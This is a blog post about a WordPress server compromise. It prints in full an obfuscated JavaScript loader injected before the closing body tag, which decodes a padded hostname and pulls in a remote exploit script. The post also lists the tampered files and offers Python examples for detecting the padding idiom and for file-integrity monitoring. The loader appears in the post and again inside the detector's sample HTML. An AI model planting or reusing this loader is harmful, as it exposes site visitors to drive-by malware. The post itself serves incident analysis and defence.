New WordPress Hack On The Loose

I received an email from someone this morning asking me to correct a problem on their WordPress site.  This in and of itself is not unusual, but what I found when I went to their site was unusual.  In fact, it was cause for alarm.

The design issue was easy enough to fix, but I received warning messages from Google Chrome when entering their website and Avast was popping up warnings telling me it was blocking a malicious script.  I thought to myself, “That’s odd, it shouldn’t be doing that.”  I looked at another WordPress website on his server and got the same warnings.

I looked at the source code for the homepage of each WordPress website and couldn’t help but notice a fat little script injected at the bottom of the page right before the closing body tag.  The code read as follows:

<script>function NeqatiqavWevpp (ZilitepicaWmufed) { var PisudwodVayora = document.cookie.indexOf (';', ZilitepicaWmufed); if (PisudwodVayora == -1) PisudwodVayora = document.cookie.length; return unescape(document.cookie.substring(ZilitepicaWmufed, PisudwodVayora)); } function KfyoFegih (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return NeqatiqavWevpp (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function FeyedoQgof (name, value) { var argv = FeyedoQgof.arguments; var argc = FeyedoQgof.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (KfyoFegih('o') == null) { var KipidBaqetogaf = 'FJVDLCZWJiCUOKnRWDFXRsACNLWIZDStOVOWFGFaBLOUIlAJRYEINEQAlYWKU-YFKOSDILMaGYCAACYdOZPSoYDGSLXbKYTOQDBLUTeFXGPH-XYYOIEQNEfBSFBlTHVOBIUNJaNYYQYAUNDsNXTZJVJIhTXNJ.XXCJIDLPMcUUPOXQHQZoOSLm'.replace(/[A-Z]/g,''); var PiqoczuDerrqar = document.createElement('script'); PiqoczuDerrqar.src = 'http://' + KipidBaqetogaf + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random() + '&fromsrv=1'; document.getElementsByTagName('head')[0].appendChild(PiqoczuDerrqar); var GakileyiqDokodizu = new Date (); GakileyiqDokodizu.setTime(GakileyiqDokodizu.getTime() + (8*3600*1000)); FeyedoQgof('o','1',GakileyiqDokodizu, '/'); }</script>
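The loader hides where it fetches its second stage from: the hostname is padded with uppercase letters and the padding is stripped at run time with `.replace(/[A-Z]/g,'')`. The Python script below is an added example for this post (it is not code from the original post or from any of the products mentioned). It scans a page's inline scripts for that idiom, applies the same transformation to recover the hostname so it can be blocked or searched for, and flags scripts that build a remote script element from it and that sit immediately before `</body>`, which is where the injection above was found. The sample HTML is constructed for the example; it embeds the loader portion of the script quoted above, with its cookie helper functions omitted.

```python
import re

# Constructed sample page: minimal markup with the loader portion of the
# script quoted in the post appended just before </body>. The cookie helper
# functions the real injection defines are left out; only the part that
# decodes the host and loads the remote script is kept.
SAMPLE_HTML = """<html><head><title>Blog</title></head><body>
<div id="content"><p>Hello world</p></div>
<script>if (KfyoFegih('o') == null) { var KipidBaqetogaf = 'FJVDLCZWJiCUOKnRWDFXRsACNLWIZDStOVOWFGFaBLOUIlAJRYEINEQAlYWKU-YFKOSDILMaGYCAACYdOZPSoYDGSLXbKYTOQDBLUTeFXGPH-XYYOIEQNEfBSFBlTHVOBIUNJaNYYQYAUNDsNXTZJVJIhTXNJ.XXCJIDLPMcUUPOXQHQZoOSLm'.replace(/[A-Z]/g,''); var PiqoczuDerrqar = document.createElement('script'); PiqoczuDerrqar.src = 'http://' + KipidBaqetogaf + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random() + '&fromsrv=1'; document.getElementsByTagName('head')[0].appendChild(PiqoczuDerrqar); }</script>
</body></html>"""

# Constructed clean page for comparison: ordinary inline scripts, no padding idiom.
CLEAN_HTML = """<html><head><script>var x = 1;</script></head><body>
<p>Nothing injected</p>
<script>document.getElementById('content');</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# The obfuscation idiom: a quoted literal followed by .replace(/[A-Z]/g,'').
# Uppercase letters are padding; whatever survives the replace is the real host.
OBF_RE = re.compile(r"'([^']*)'\s*\.replace\(\s*/\[A-Z\]/g\s*,\s*''\s*\)")
# A dynamically created script element whose src is built from a variable
# rather than a fixed URL, i.e. a remote loader.
REMOTE_LOAD_RE = re.compile(r"\.src\s*=\s*'https?://'\s*\+\s*\w+")


def decode_uppercase_filter(literal):
    """Apply the same transformation the loader applies: drop every A-Z."""
    return re.sub(r"[A-Z]", "", literal)


def inspect_page(html):
    """Return one finding per inline script that uses the uppercase-padding
    idiom, with the decoded host(s) and a few contextual flags."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hosts = [decode_uppercase_filter(lit) for lit in OBF_RE.findall(body)]
        if not hosts:
            continue
        tail = html[m.end():]
        findings.append({
            "hosts": hosts,
            "loads_remote_script": REMOTE_LOAD_RE.search(body) is not None,
            "immediately_before_body_close": re.match(r"\s*</body>", tail, re.IGNORECASE) is not None,
        })
    return findings


def blocklist(findings):
    """Decoded hosts to block at the proxy/DNS and to grep server files for."""
    return sorted({h for f in findings for h in f["hosts"]})


if __name__ == "__main__":
    found = inspect_page(SAMPLE_HTML)
    for f in found:
        print(f)
    print("block:", blocklist(found))
    print("clean page findings:", inspect_page(CLEAN_HTML))
```

Running this against the sample prints the recovered host and the two flags set; against the clean page it prints nothing. A quick server-side triage for this particular family is to search every `.php`, `.htm` and `.html` under the WordPress install for the string `replace(/[A-Z]/g`, since the padding idiom is what the loader needs and is rare in legitimate theme code.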

I called the person who emailed me to inform him of this hack and he told me that he received an email earlier this morning notifying him that many WordPress files had been changed (he uses the WordPress File Monitor plugin).  In the email, it said the following files had been changed:

wp-login.php
wp-app.php
wp-links-opml.php
wp-settings.php
testrssfeed.php
readme.html
wp-admin/install.php
wp-admin/admin-footer.php
wp-admin/sidebar.php
wp-admin/press-this.php
wp-admin/upgrade.php
wp-admin/setup-config.php
wp-admin/import/blogware.php
wp-admin/import/livejournal.php
wp-admin/maint/repair.php
wp-admin/includes/media.php
wp-admin/includes/template.php
wp-includes/functions.php
wp-includes/js/codepress/codepress.html
wp-includes/js/tinymce/wp-mce-help.php
wp-includes/js/tinymce/blank.htm
wp-includes/js/tinymce/plugins/media/media.htm
wp-includes/js/tinymce/plugins/inlinepopups/template.htm
wp-includes/js/tinymce/plugins/wpeditimage/editimage.html
wp-includes/js/tinymce/plugins/paste/blank.htm
wp-includes/js/tinymce/plugins/paste/pastetext.htm
wp-includes/js/tinymce/plugins/paste/pasteword.htm
wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm
wp-includes/js/tinymce/themes/advanced/link.htm
wp-includes/js/tinymce/themes/advanced/source_editor.htm
wp-includes/js/tinymce/themes/advanced/anchor.htm
wp-includes/js/tinymce/themes/advanced/color_picker.htm
wp-includes/js/tinymce/themes/advanced/charmap.htm
wp-includes/js/tinymce/themes/advanced/about.htm
wp-includes/js/tinymce/themes/advanced/image.htm
wp-content/plugins/wp-pagenavi/readme.html
wp-content/plugins/membership-subscription-management/byrd_rolessubscriptions/database/index.html
wp-content/plugins/membership-subscription-management/byrd_rolessubscriptions/database/database/index.html
wp-content/plugins/role-scoper/RoleScoper_UsageGuide.htm
wp-content/plugins/search-unleashed/engines/Zend/Search/Lucene/Search/Query.php
wp-content/plugins/search-unleashed/engines/Zend/Search/Lucene/Document/Html.php
wp-content/plugins/featured-category/featcat_admin.php
wp-content/uploads/2010/01/Author-posts.html
wp-content/themes/classic/comments-popup.php
wp-content/themes/classic/footer.php
wp-content/themes/mpdailyfix/comments-popup.php
wp-content/themes/mpdailyfix/footer.php
wp-content/themes/default/comments-popup.php
wp-content/themes/default/footer.php

As of right now we’re looking into restoring the sites to their original state and changing all logins and passwords, as I’m not sure what this script has done or what it has gained access to.

I should also note that many of the sites infected are running the current version of WordPress (2.9.1) and I didn’t find any references to this script on Google.  It’s entirely possible that this is a new WordPress hack.

If your WordPress site(s) suddenly pop up with warnings when you visit them, check your source code and look for anything out of the ordinary, or have someone else look into it for you.  Using the WordPress File Monitor plugin is also a great idea for security purposes: it is what alerted the owner here, before any visitor complained.  If you don’t currently use a file monitoring program, then I recommend you check into this one.
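The File Monitor plugin's alert is what tipped the owner off, and the underlying idea is simple enough to run outside WordPress as well. The following Python script is an added example (not the plugin's own code and not from the original post): it hashes every file under an install, stores the manifest as JSON, and diffs a fresh manifest against it to report added, removed and changed paths. `demo()` builds a constructed three-file tree, then simulates what the post describes (a script appended before `</body>` in a theme footer and an unknown PHP file appearing in the web root) and returns the diff. All paths and file contents in the demo are made up.

```python
import hashlib
import json
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large uploads don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file's path (relative to root, '/'-separated) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def save_manifest(manifest, path):
    # Keep the baseline outside the web root, or the attacker can rewrite it too.
    with open(path, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


def diff_manifests(baseline, current):
    """Added = new files, removed = gone, changed = same path, different hash."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def demo():
    """Constructed scenario: baseline a tiny fake WordPress tree, simulate an
    injection like the one in the post, and return what the diff reports."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        files = {
            "wp-login.php": "<?php // constructed stand-in for the real file\n",
            "wp-content/themes/default/footer.php": "</div>\n</body>\n</html>\n",
            "wp-content/themes/default/style.css": "body { margin: 0 }\n",
        }
        for rel, content in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as f:
                f.write(content)

        baseline_path = os.path.join(store, "baseline.json")
        save_manifest(build_manifest(root), baseline_path)

        # Simulate the injection: a script tag appended right before </body>
        # in a theme footer, plus an unknown PHP file dropped into the root.
        footer = os.path.join(root, "wp-content/themes/default/footer.php")
        with open(footer) as f:
            html = f.read()
        with open(footer, "w") as f:
            f.write(html.replace("</body>", "<script>/* constructed injected marker */</script>\n</body>"))
        with open(os.path.join(root, "unknown-upload.php"), "w") as f:
            f.write("<?php // constructed stand-in for an attacker-uploaded file\n")

        return diff_manifests(load_manifest(baseline_path), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

In practice you would take the baseline right after a clean install or upgrade, store it (and ideally run the check) from somewhere the web server's account cannot write, and re-baseline deliberately after each legitimate update so that expected changes don't drown out the ones that matter.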

Update: Maybe this is not a “new” WordPress hack, but it is the result of a malicious PHP file.  The hosting company that manages the server involved in this attack responded with the following:

In reviewing the server’s configuration it was discovered that “Allow FTP logins to all accounts using the root password” was enabled in the server’s WHM configuration.

The attacker appears to have compromised the server’s root password. The root password has been changed.

All accounts were affected by a malicious script insertion attack. An attacker was able to upload a malicious PHP file via FTP. This file was then executed and used to insert the malicious script into each site on the server.

The “Allow FTP logins to all accounts using the root password” setting has been disabled and the removal of the script from all accounts on the server has been completed.

What the script does:

This script executes a malicious JavaScript package hosted on a remote server in the context of the user’s browser. This script is designed to run browser exploits against outdated web browsers with known vulnerabilities. Thus anyone who visited any of the infected sites with an out of date browser may have had malware/viruses installed on their local computer. Once a local computer is compromised, the malware will begin searching the local computer’s hard drive for saved passwords so that it can repeat the process by uploading itself to other FTP accounts.

This type of attack has, unfortunately, become quite common. For a more detailed explanation of how this type of malware works please see: http://www.viruslist.com/en/weblog?weblogid=208187897

You are recommended to run anti-virus and spyware detection software on your local computer.
